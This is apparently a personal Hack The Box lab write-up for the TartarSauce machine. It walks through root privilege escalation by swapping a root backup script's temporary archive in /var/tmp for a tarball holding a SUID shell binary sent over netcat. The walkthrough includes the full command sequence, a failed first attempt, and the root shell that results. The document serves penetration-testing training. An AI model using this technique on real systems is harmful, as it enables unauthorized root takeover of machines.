File Hijacking

During the post enumeration phase, I have discovered that there is a systemd job running every 5 minutes that calls a binary, /usr/sbin/backuperer, which is a bash script that runs a set of commands. It was also discovered manually by going through the home directory of the onuma user

i will be diving into an in-depth analysis of the bash script below: /usr/sbin/backuperer is a bash script that: • Creates a backup file of /var/www/html and gives it 30 seconds to completes • Stores it temporarily at /var/tmp as $tmpfile, which is a random string • Creates a variable directory, $check, under /var/tmp • Extracts $tmpfile to the $check directory • Runs a function, integrity_chk() that checks for differences between the base directory($basedir) and the newly created directory /var/tmp/check/$basedir from the extraction above - If the integrity_chk() command returns nothing, moves $tmpfile to the backup directory as onuma-www-dev.back - If the integrity_chk() command returns any, prints out the error message variable

Now looking at it in-depth, I believe there is a way to escalate the privilege It’s by hijacking the content of $tmpfile as it gets stored in /var/tmp, which is a directory that is writable by anyone

First Attempt

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo mkdir -p var/www/html ; sudo cp ToRoot var/www/html/

I will create a directory, var/www/html, to mimic the $basedir variable in backuperer I will also place the payload in it

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo chmod 6555 var/www/html/ToRoot                      
 
┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ ll var/www/html/ToRoot
16K -r-sr-sr-x 1 root root 15K Oct 24 19:05 var/www/html/ToRoot

I can then turn the binary into a SUID binary by setting the permission bits to 6555 This is for assurance.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo tar -zcvf hijacker.tar.gz var/
var/
var/www/
var/www/html/
var/www/html/ToRoot

The directory then needs to be archive. I named it hijacker.tar.gz

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nc $IP 2222 < hijacker.tar.gz
 
onuma@TartarSauce:/var/tmp$ nc -nlvp 2222 > hijacker.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.14.10] port 2222 [tcp/*] accepted (family 2, sport 45986)

The archive is then transferred to the target in the /var/tmp directory

onuma@TartarSauce:/var/tmp$ ls -la
total 44
drwxrwxrwt 10 root  root  4096 Jan 23 09:34 .
drwxr-xr-x 14 root  root  4096 May 12  2022 ..
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

I can confirm that the archive is now present at /var/tmp/hijacker.tar.gz on the target system

onuma@TartarSauce:/var/tmp$ systemctl list-timers --all systemctl list-timers --all 
systemctl list-timers --all 
NEXT                         LEFT          LAST                         PASSED  
Mon 2023-01-23 09:40:53 EST  1min 54s left Mon 2023-01-23 09:35:53 EST  3min 5s 
Mon 2023-01-23 20:07:17 EST  10h left      Mon 2023-01-23 06:39:26 EST  2h 59min
Tue 2023-01-24 06:05:22 EST  20h left      Mon 2023-01-23 06:39:26 EST  2h 59min
Tue 2023-01-24 06:54:31 EST  21h left      Mon 2023-01-23 06:54:31 EST  2h 44min
n/a                          n/a           n/a                          n/a     
n/a                          n/a           n/a                          n/a     
n/a                          n/a           n/a                          n/a     
 
7 timers listed.

I got about less than 2 minutes left until the next backuperer operation

onuma@TartarSauce:/var/tmp$ systemctl list-timers --all systemctl list-timers --all 
systemctl list-timers --all 
NEXT                         LEFT     LAST                         PASSED       
Mon 2023-01-23 09:40:53 EST  5s ago   Mon 2023-01-23 09:40:57 EST  2s ago

It says it already executed 2 seconds ago,. It should have created the $tmpfile file with a random string

onuma@TartarSauce:/var/tmp$ ll
total 9116
drwxrwxrwt 10 root  root     4096 Jan 23 09:40 ./
drwxr-xr-x 14 root  root     4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 9289728 Jan 23 09:41 .1af5ba1a8041b868e61186abbe147931abfaf523
-rw-r--r--  1 onuma onuma    2636 Jan 23 09:34 hijacker.tar.gz

I can see it right there. .1af5ba1a8041b868e61186abbe147931abfaf523 is the $tmpfile file, and also is 9289728 bytes big

Time for hijacking

onuma@TartarSauce:/var/tmp$ cp hijacker.tar.gz .1af5ba1a8041b868e61186abbe147931abfaf523
onuma@TartarSauce:/var/tmp$ ll
total 48
drwxrwxrwt 10 root  root  4096 Jan 23 09:40 ./
drwxr-xr-x 14 root  root  4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:41 .1af5ba1a8041b868e61186abbe147931abfaf523
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

I copied the content of the hijacker.tar.gz file into the $tmpfile file; .1af5ba1a8041b868e61186abbe147931abfaf523 As shown, they both now have the same byte size, implying that the copying was successful

onuma@TartarSauce:/var/tmp$ ll
total 52
drwxrwxrwt 11 root  root  4096 Jan 23 09:41 ./
drwxr-xr-x 14 root  root  4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:41 .1af5ba1a8041b868e61186abbe147931abfaf523
drwxr-xr-x  3 root  root  4096 Jan 23 09:41 check/
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

A moment later, backuperer extracted $tmpfile to the newly created $check directory. However, that check/ directory should contain my payload, ToRoot(shell spawner), as I replaced the content of $tmpfile above with hijacker.tar.gz This whole operation was done with privileges of the root user, so the payload now should be owned by the rootuser

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./ToRoot
./ToRoot: /lib/i386-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ToRoot)

Attempting to spawn a shell results in failure. The error message shows that glibc 2.34 isn’t found within the system. This is quite obvious because the payload was compiled in Kali with a different version of glic

I even enumerated the version of glic in the target system earlier. It is glibc 2.23 I should have payed more attention.

But that’s okay, I can re-do all this with a correctly compiled binary again

Second Attempt

The binary is compiled in a docker container that has the same glibc version and delivered back to Kali for preparation.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo cp ToRoot var/www/html ; sudo chmod 6555 var/www/html/ToRoot
┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ ll var/www/html                                          
total 16K
4.0k drwxr-xr-x 2 root root 4.0k oct 24 22:51 .
8.0k -r-sr-sr-x 1 root root 7.3k oct 24 22:51 ToRoot
4.0k drwxr-xr-x 3 root root 4.0k oct 24 19:05 ..

Place the binary at the directory, var/www/html, and turn it into a SUID binary by changing its permission bits to 6555

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo tar -czvf hijacker.tar.gz var/
var/
var/www/
var/www/html/
var/www/html/ToRoot

Package it up with tar as hijacker.tar.gz

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nc 10.10.10.88 1234 < hijacker.tar.gz
 
onuma@tartarsauce:/var/tmp$ nc -nvlp 1234 > hijacker.tar.gz
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [10.10.14.10] port 1234 [tcp/*] accepted (family 2, sport 53934)

I will then deliver the archive to the target system and put it in the /var/tmp directory like before.

onuma@tartarsauce:/var/tmp$ systemctl list-timers --all systemctl list-timers --all 
systemctl list-timers --all 
NEXT                         LEFT     LAST                         PASSED       
mon 2023-01-23 09:58:53 EST  19s left Mon 2023-01-23 09:53:53 EST  4min 40s ago

19 seconds left until the next backuperer operation

onuma@tartarsauce:/var/tmp$ ll
total 11288
drwxrwxrwt 10 root  root      4096 jan 23 10:11 ./
drwxr-xr-x 14 root  root      4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 11511296 jan 23 10:11 .4c30959c869b566c6e05c71b757101a2abd94f20
-rw-r--r--  1 onuma onuma     2636 jan 23 09:34 hijacker.tar.gz

The $tmpfile file shows up again! Time to hijack it!

onuma@tartarsauce:/var/tmp$ cp hijacker.tar.gz .4c30959c869b566c6e05c71b757101a2abd94f20

Replacing .4c30959c869b566c6e05c71b757101a2abd94f20 with content of the hijacker.tar.gz file

onuma@tartarsauce:/var/tmp$ ll
total 52
drwxrwxrwt 11 root  root  4096 jan 23 10:11 ./
drwxr-xr-x 14 root  root  4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 2636 jan 23 10:11 .4c30959c869b566c6e05c71b757101a2abd94f20
drwxr-xr-x  3 root  root  4096 jan 23 10:11 check/
-rw-r--r--  1 onuma onuma 2636 jan 23 09:34 hijacker.tar.gz

30 seconds must have passed by There shows the $check directory that contains the extracted $tmpfile, which had its content replaced with my archive,

onuma@tartarsauce:/var/tmp/check/var/www/html$ ls
ToRoot

and at last.. ToRoot is here

onuma@tartarsauce:/var/tmp/check/var/www/html$ ./ToRoot
# whoami
whoami
root
# hostname
hostname
TartarSauce
# ifconfig
ifconfig
ens192    link encap:Ethernet  HWaddr 00:50:56:b9:55:4f  
          inet addr:10.10.10.88  Bcast:10.10.10.255  Mask:255.255.255.0
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:1295509 errors:0 dropped:76 overruns:0 frame:0
          tx packets:1289042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:280030720 (280.0 MB)  TX bytes:608490772 (608.4 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          up loopback running  mtu:65536  Metric:1
          rx packets:35192 errors:0 dropped:0 overruns:0 frame:0
          tx packets:35192 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:2610848 (2.6 MB)  TX bytes:2610848 (2.6 MB)

System Level Compromise

InfoSec LAB

Explorer

TartarSauce_Privilege_Escalation

File Hijacking

First Attempt

Second Attempt

Interactive Graph View

Table of Contents

Backlinks